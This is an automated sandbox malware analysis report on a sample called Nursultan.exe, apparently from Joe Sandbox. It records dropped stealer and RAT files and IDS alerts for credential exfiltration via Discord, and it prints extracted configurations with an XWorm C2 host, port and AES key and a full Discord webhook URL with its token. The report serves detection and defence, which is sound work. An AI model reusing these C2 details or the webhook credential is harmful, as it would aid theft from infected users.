                            2024-09-07T01:47:46.654886+020028033053Unknown Traffic192.168.2.549731208.95.112.180TCP
                            2024-09-07T01:48:02.808800+020028033053Unknown Traffic192.168.2.549753208.95.112.180TCP
                            2024-09-07T01:48:16.913682+020028033053Unknown Traffic192.168.2.549769208.95.112.180TCP
                            2024-09-07T01:48:29.257120+020028033053Unknown Traffic192.168.2.549783208.95.112.180TCP
                            2024-09-07T01:48:41.243964+020028033053Unknown Traffic192.168.2.549798208.95.112.180TCP
                            2024-09-07T01:48:54.528533+020028033053Unknown Traffic192.168.2.549812208.95.112.180TCP
                            2024-09-07T01:49:09.463268+020028033053Unknown Traffic192.168.2.549827208.95.112.180TCP

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus / Scanner detection for submitted sample
                            Source: Nursultan.exeAvira: detected
                            Antivirus detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeAvira: detection malicious, Label: HEUR/AGEN.1307065
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeAvira: detection malicious, Label: TR/Dropper.Gen
                            Source: C:\Users\user\AppData\Roaming\Microsoft EdgeAvira: detection malicious, Label: TR/Spy.Gen
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeAvira: detection malicious, Label: TR/Spy.Gen
                            Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scrAvira: detection malicious, Label: HEUR/AGEN.1307507
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeAvira: detection malicious, Label: TR/Dropper.Gen
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeAvira: detection malicious, Label: HEUR/AGEN.1307507
                            Found malware configuration
                            Source: 00000003.00000002.3293638320.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["stage-von.gl.at.ply.gg"], "Port": "19496", "Aes key": "234234", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                            Source: 11.0.Insidious.exe.24510880000.0.unpackMalware Configuration Extractor: 44Caliber Stealer {"Discord Webhook": "https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9\u0001Spidey Bot"}
                            Source: 4.2.Nursultan2.exe.12f60e40.1.raw.unpackMalware Configuration Extractor: Umbral Stealer {"C2 url": "https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9", "Version": "v1.3"}
                            Multi AV Scanner detection for dropped file
                            Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scrReversingLabs: Detection: 91%
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeReversingLabs: Detection: 87%
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeReversingLabs: Detection: 83%
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeReversingLabs: Detection: 91%
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeReversingLabs: Detection: 87%
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeReversingLabs: Detection: 91%
                            Source: C:\Users\user\AppData\Roaming\Microsoft EdgeReversingLabs: Detection: 83%
                            Multi AV Scanner detection for submitted file
                            Source: Nursultan.exeReversingLabs: Detection: 81%
                            Yara detected BlackGuard
                            Source: Yara matchFile source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                            Machine Learning detection for dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Roaming\Microsoft EdgeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeJoe Sandbox ML: detected
                            Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scrJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeJoe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeJoe Sandbox ML: detected
                            Machine Learning detection for sample
                            Source: Nursultan.exeJoe Sandbox ML: detected
                            Sample uses string decryption to hide its real strings
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpackString decryptor: stage-von.gl.at.ply.gg
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpackString decryptor: 19496
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpackString decryptor: 234234
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpackString decryptor: <Xwormmm>
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpackString decryptor: XWorm V5.6
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpackString decryptor: USB.exe
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpackString decryptor: %AppData%
                            Source: 0.2.Nursultan.exe.128b3a60.1.raw.unpackString decryptor: Microsoft Edge

                            Location Tracking

                            barindex
                            Tries to detect the country of the analysis system (by using the IP)
                            Source: unknownDNS query: name: freegeoip.app
                            Source: Nursultan.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49707 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49715 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49716 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49718 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49719 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49720 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49721 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49722 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49723 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49724 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49725 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49726 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49727 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49729 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49730 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:49732 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49734 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49735 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49739 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49742 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49748 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49749 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49750 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49751 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49754 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49756 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49758 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49759 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49761 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49763 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49765 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49766 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49768 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49770 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:49771 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49773 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49774 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49776 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49778 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49780 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49781 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49784 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:49786 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49788 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49790 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49795 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49799 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49800 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49804 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49806 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49808 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49809 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49813 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49817 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49821 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49824 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49826 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.85.189:443 -> 192.168.2.5:49831 version: TLS 1.2
                            Source: Nursultan.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: mscorlib.pdb source: Insidious.exe, 0000000B.00000002.2166607567.0000024512696000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: Insidious.exe, 0000000B.00000002.2166607567.0000024512751000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\maksi\Desktop\44CALIBER-main\44CALIBER\obj\Release\Insidious.pdb source: Insidious.exe, 0000000B.00000002.2166607567.00000245126B4000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, Insidious.exe.4.dr
                            Source: Binary string: .Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: Insidious.exe, 0000000B.00000002.2157271503.0000024510BA1000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: Insidious.exe, 0000000B.00000002.2166607567.0000024512751000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: Insidious.exe, 0000000B.00000002.2157271503.0000024510BA1000.00000004.00000020.00020000.00000000.sdmp

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2045593 - Severity 1 - ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) : 192.168.2.5:49755 -> 162.159.136.232:443
                            Source: Network trafficSuricata IDS: 2045593 - Severity 1 - ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) : 192.168.2.5:49732 -> 162.159.135.232:443
                            Source: Network trafficSuricata IDS: 2045593 - Severity 1 - ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) : 192.168.2.5:49771 -> 162.159.135.232:443
                            Source: Network trafficSuricata IDS: 2045593 - Severity 1 - ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) : 192.168.2.5:49786 -> 162.159.135.232:443
                            Source: Network trafficSuricata IDS: 2045593 - Severity 1 - ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) : 192.168.2.5:49801 -> 162.159.136.232:443
                            Source: Network trafficSuricata IDS: 2045593 - Severity 1 - ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) : 192.168.2.5:49814 -> 162.159.138.232:443
                            Source: Network trafficSuricata IDS: 2045593 - Severity 1 - ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) : 192.168.2.5:49828 -> 162.159.137.232:443
                            C2 URLs / IPs found in malware configuration
                            Source: Malware configuration extractorURLs: stage-von.gl.at.ply.gg
                            Source: Malware configuration extractorURLs: https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9
                            Yara detected Generic Downloader
                            Source: Yara matchFile source: 3.0.Microsoft Edge.exe.b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: Process Memory Space: Umbral.exe PID: 2316, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft Edge, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED
                            Source: global trafficTCP traffic: 192.168.2.5:49728 -> 147.185.221.22:19496
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.com
                            Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                            Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                            Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                            Source: unknownDNS query: name: ip-api.com
                            Source: unknownDNS query: name: ip-api.com
                            Source: unknownDNS query: name: ip-api.com
                            Source: unknownDNS query: name: ip-api.com
                            Source: unknownDNS query: name: ip-api.com
                            Source: unknownDNS query: name: ip-api.com
                            Source: unknownDNS query: name: ip-api.com
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49731 -> 208.95.112.1:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49753 -> 208.95.112.1:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49769 -> 208.95.112.1:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49783 -> 208.95.112.1:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49798 -> 208.95.112.1:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49812 -> 208.95.112.1:80
                            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49827 -> 208.95.112.1:80
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /xml/ HTTP/1.1Host: ipbase.comConnection: Keep-Alive
